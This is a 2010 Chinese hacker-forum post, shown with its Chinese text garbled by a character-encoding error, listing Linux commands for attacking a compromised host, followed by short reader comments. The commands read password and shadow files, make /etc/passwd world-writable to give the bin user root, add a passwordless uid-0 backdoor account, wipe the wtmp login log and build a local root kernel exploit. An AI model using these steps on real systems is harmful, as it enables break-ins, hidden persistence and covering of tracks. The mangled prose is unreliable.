ºìÁªLinuxÃÅ»§
Linux°ïÖú

½ø¹¥linux ±Ø±¸µÄ×°±¸

·¢²¼Ê±¼ä:2010-01-26 14:42:01À´Ô´:ºìÁª×÷Õß:ciscobhl
cat /etc/passwd ²é¿´linuxÓû§
cat /etc/shadow ²é¿´Óû§ÃÜÂëÐèÒªrootȨÏÞ
cat /etc/sysconfig/network-scripts/ifcfg-ethn N´ú±íÍø¿¨ºÅ ²é¿´ËùÔÚÍø¿¨µÄipÐÅÏ¢
ifconfig ²é¿´±¾»úipÐÅÏ¢
cat /etc/resolv.conf ²é¿´DNSÐÅÏ¢
bash -i ÔÚ·´µ¯µÄshellÖÐʹÓÿÉÒÔÖ±¹ÛÏÔʾÃüÁî
bash prompt: µ±ÄãÒÔÆÕͨÏÞȨÓû§Éí·Ý½øÈëµÄʱºò£¬Ò»°ãÄã»áÓÐÒ»¸öÀàËÆbash$µÄprompt¡£µ±ÄãÒÔRootµÇ½ʱ£¬ÄãµÄprompt»á±ä³É
bash#¡£
ϵͳ±äÁ¿ : ÊÔ×Åecho "$USER / $EUID" ϵͳӦ¸Ã»á¸æËßÄãËüÈÏΪÄãÊÇʲôÓû§¡£
echo 1>/proc/sys/net/ipv4/if_forwardÊDz»ÊÇÄãд´íÁË,Ó¦¸ÃÊÇecho 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward °É,ĬÈÏÊÇ0,Ò²¾ÍÊÇÄں˲»½øÐÐÊý¾Ý°ü¹ýÂË,¸ÄΪ1 ,ÈÃÄں˶ÔÊý¾Ý°ü½øÐÐfilter´¦Àí!
netstat -an |grep LISTEN |grep :80 ²é¿´¶Ë¿Ú
service --status-all | grep running

service --status-all | grep http
²é¿´ÔËÐзþÎñ
lsb_release -a ²é¿´ÏµÍ³°æ±¾
ÖØÆôssh·þÎñ £º/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_configÎļþÀï
PasswordAuthentication no,
½«Æä¸ÄΪ
PasswordAuthentication yes
Ô¶³Ìssh²Å¿ÉµÇ¼
·ñÔòÏÔʾAccess denied

ÆäÖÐUsepam yes¿ÉÄÜÓÃÀ´½¨Á¢pam·½Ê½login£¬±ÈÈç´ÓÆäËülinuxÖ÷»ússhµ½·þÎñ¶Ë£¬Èç¹û¹Ø±Õ£¬Ôò²»ÄÜ´ò¿ª.

suµÄ²ËÄñÓ÷¨
ÏÈchomod 777 /etc/passwd
È»ºóÐÞ¸ÄbinÓû§µÄgidºÍuidΪ0
È»ºópasswdÉèÖÃbinµÄÃÜÂë
È»ºócp /bin/bash /sbin/nologin
È»ºósuµÄʱºòsu - bin¾Í¿ÉÒÔµ½rootshellÁË¡£
Õâ¸öÔ­Àí¾ÍÊǵ±ssh²»ÔÊÐírootÓÃsshÖն˵ǽµÄʱºò£¬ÎÒÃÇÓÖ²»ÖªµÀrootÃÜÂ룬µÄÒ»ÖֺܲËÄñµÄ×ö·¨
»¹¿ÉÒÔÕâÑù
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c -o local -static -Wall

echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

Çå¿Õlast¼Ç¼ cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 ½¨Á¢Ò»¸ö100mµÄ´óÎļþÔÚÀûÓÃLinux Kernel <= 2.6.17.4 (proc) Local Root ExploitÌáȨµÄʱºòÒªÓõ½µÄ
ÎÄÕÂÆÀÂÛ

¹²ÓÐ 7 ÌõÆÀÂÛ

  1. kantiede ÓÚ 2010-01-31 14:45:34·¢±í:

    ѧϰ

  2. aqq5220 ÓÚ 2010-01-29 18:35:18·¢±í:

    ¹þ¹þ£¬É³·¢ËµµÄºÃ£¡

  3. duo2752 ÓÚ 2010-01-29 15:02:38·¢±í:

    ʲôÊÖ¶¼Ó¦¸Ã¿´¿´

  4. ftp0000 ÓÚ 2010-01-29 12:47:33·¢±í:

    2# xlniva


    ÊÇѽ£¬Ïµ½ÁË{:3_121:}

  5. skypeng ÓÚ 2010-01-29 11:20:35·¢±í:

    ÊʺÏÐÂÊÖ

  6. ainiaa ÓÚ 2010-01-29 11:15:15·¢±í:

    ¶àлlzµÄ·ÖÏí¡£
    ÐÂÊÖ¡£
    ÕýÏë½ø¾üliunx

  7. xlniva ÓÚ 2010-01-27 08:10:58·¢±í:

    Õ⻹²»Ïŵ¹ÏëÓÃlinuxµÄÈ˹þ